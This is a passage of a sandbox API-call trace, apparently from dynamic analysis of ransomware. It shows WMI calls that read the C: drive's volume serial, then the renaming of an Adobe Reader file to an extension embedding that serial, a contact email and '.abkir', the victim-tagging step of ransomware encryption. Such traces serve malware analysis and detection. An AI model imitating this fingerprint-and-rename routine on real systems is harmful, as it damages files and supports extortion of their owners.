| out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0206.041] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.041] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0206.041] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0206.041] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0206.041] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.042] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027310) returned 0x0 [0206.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027310, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0206.042] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027310, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6031430) returned 0x0 [0206.042] WbemDefPath:IUnknown:Release (This=0x6027310) returned 0x0 [0206.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6031430) returned 0x0 [0206.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0206.042] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0206.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0206.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0206.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbdeea0) returned 0x0 [0206.043] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdeea0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.043] WbemDefPath:IUnknown:Release (This=0xbdeea0) returned 0x3 [0206.043] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0206.043] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0206.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0206.043] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0206.043] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0206.043] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0206.043] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0206.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6031430) returned 0x0 [0206.043] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0206.043] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0206.043] WbemDefPath:IWbemPath:SetText (This=0x6031430, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0206.043] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0206.043] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0206.043] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.043] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0206.043] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0206.044] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0206.044] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.044] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024938) returned 0x0 [0206.044] WbemLocator:IUnknown:QueryInterface (in: This=0x6024938, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0206.044] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024938, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027320) returned 0x0 [0206.044] WbemLocator:IUnknown:Release (This=0x6024938) returned 0x0 [0206.044] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027320) returned 0x0 [0206.045] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0206.045] WbemLocator:IUnknown:AddRef (This=0x6027320) returned 0x3 [0206.045] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0206.045] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0206.045] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0206.045] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0206.045] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0206.045] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0206.045] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x2 [0206.045] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x1 [0206.045] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0206.045] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0206.045] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027320) returned 0x0 [0206.045] WbemLocator:IUnknown:AddRef (This=0x6027320) returned 0x3 [0206.045] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x2 [0206.045] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0206.045] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0206.045] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.045] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027330) returned 0x0 [0206.046] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027330, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6033794) returned 0x0 [0206.471] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b9a4) returned 0x0 [0206.471] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b9a4, pProxy=0x6033794, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0206.471] WbemLocator:IUnknown:Release (This=0xb5b9a4) returned 0x1 [0206.471] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b9c4) returned 0x0 [0206.471] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b9a4) returned 0x0 [0206.471] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b9a4, pProxy=0x6033794, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0206.472] WbemLocator:IUnknown:Release (This=0xb5b9a4) returned 0x2 [0206.472] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x1 [0206.472] CoTaskMemFree (pv=0xbd4a68) [0206.472] WbemLocator:IUnknown:Release (This=0x6027330) returned 0x0 [0206.472] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b9c4) returned 0x0 [0206.472] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0206.513] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0206.516] WbemLocator:IUnknown:AddRef (This=0xb5b9c4) returned 0x3 [0206.516] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0206.517] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0206.518] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b924) returned 0x0 [0206.518] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b924, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.519] WbemLocator:IUnknown:Release (This=0xb5b924) returned 0x3 [0206.519] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0206.519] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0206.519] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b9ac) returned 0x0 [0206.519] WbemLocator:IRpcOptions:Query (in: This=0xb5b9ac, pPrx=0xb5b9c4, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0206.519] WbemLocator:IUnknown:Release (This=0xb5b9ac) returned 0x3 [0206.519] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x2 [0206.519] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0206.519] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0206.519] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6033794) returned 0x0 [0206.519] WbemLocator:IUnknown:AddRef (This=0x6033794) returned 0x4 [0206.519] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x3 [0206.519] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x2 [0206.519] SysStringLen (param_1=0x0) returned 0x0 [0206.519] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0206.519] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0206.519] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.519] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0206.519] WbemLocator:IUnknown:AddRef (This=0xb5b9c4) returned 0x3 [0206.519] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b9c4) returned 0x0 [0206.519] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x3 [0206.519] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x2 [0206.519] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0206.519] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.520] IWbemServices:GetObject (in: This=0x6033794, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0206.736] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0206.736] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0206.737] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.737] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3692540*=0, plFlavor=0x3692544*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3692540*=8, plFlavor=0x3692544*=0) returned 0x0 [0206.737] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.737] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.737] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3692540*=8, plFlavor=0x3692544*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3692540*=8, plFlavor=0x3692544*=0) returned 0x0 [0206.737] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.737] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.737] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", lpFilePart=0x0) returned 0x36 [0206.737] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0206.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0206.737] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x3465b4a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0206.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0206.738] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0206.739] 